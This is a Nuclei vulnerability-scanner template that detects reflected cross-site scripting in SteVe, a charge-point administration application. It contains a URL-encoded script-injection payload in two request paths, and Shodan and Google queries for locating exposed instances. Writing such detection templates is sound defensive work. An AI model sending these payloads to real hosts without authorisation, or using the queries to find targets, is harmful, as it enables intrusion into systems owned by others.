nuclei-templates/vulnerabilities/other/steve-xss.yaml


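# Nuclei template: reflected cross-site scripting check for SteVe.
# A finding means a marker sent in the URL path came back unencoded in an
# HTML page. The template does not say which SteVe versions are affected.
# On a match, confirm the deployed version and fix it server-side by
# HTML-encoding the request path before it is written into the page.
id: steve-xss

info:
  name: SteVe - Cross-Site Scripting
  author: clem9669
  severity: medium
  # The first sentence states what the template detects, so scan reports
  # describe the finding rather than only the product.
  description: |
    Detects reflected cross-site scripting in SteVe: markup placed in the URL path under /services/ is returned unencoded in an HTML response.
    The aim of SteVe is to support the deployment and popularity of electric mobility. SteVe provides basic functions for the administration of charge points.
  reference:
    - https://github.com/steve-community/steve
  metadata:
    verified: true
    # Asset-inventory queries keyed on the product's page title.
    shodan-query: http.title:"SteVe - Steckdosenverwaltung"
    google-query: intitle:"SteVe - Steckdosenverwaltung"
  tags: steve,xss

requests:
  - method: GET
    # Two candidate locations: the application under the /steve/ prefix and
    # at the web root. The marker is the same in both.
    path:
      - '{{BaseURL}}/steve/services/"%3E%3Cscript%3Ealert(document.domain)%3C/script%3E/services/'
      - '{{BaseURL}}/services/"%3E%3Cscript%3Ealert(document.domain)%3C/script%3E/services/'

    # Stop after the first path that matches, so one host yields one finding.
    stop-at-first-match: true
    # All three matchers must hold. Requiring them together keeps
    # false positives down.
    matchers-condition: and
    matchers:
      # The marker must appear decoded and unescaped in the body, followed
      # by the text the page places after it. The trailing
      # '/services/?stylesheet=1">' looks like the application's own markup
      # around the reflection; confirm against a real response.
      - type: word
        part: body
        words:
          - '<script>alert(document.domain)</script>/services/?stylesheet=1">'

      # Only count responses served as HTML. This word is searched in the
      # whole header block, not only in Content-Type.
      - type: word
        part: header
        words:
          - "text/html"

      # Ignore error pages and redirects that merely echo the URL.
      - type: status
        status:
          - 200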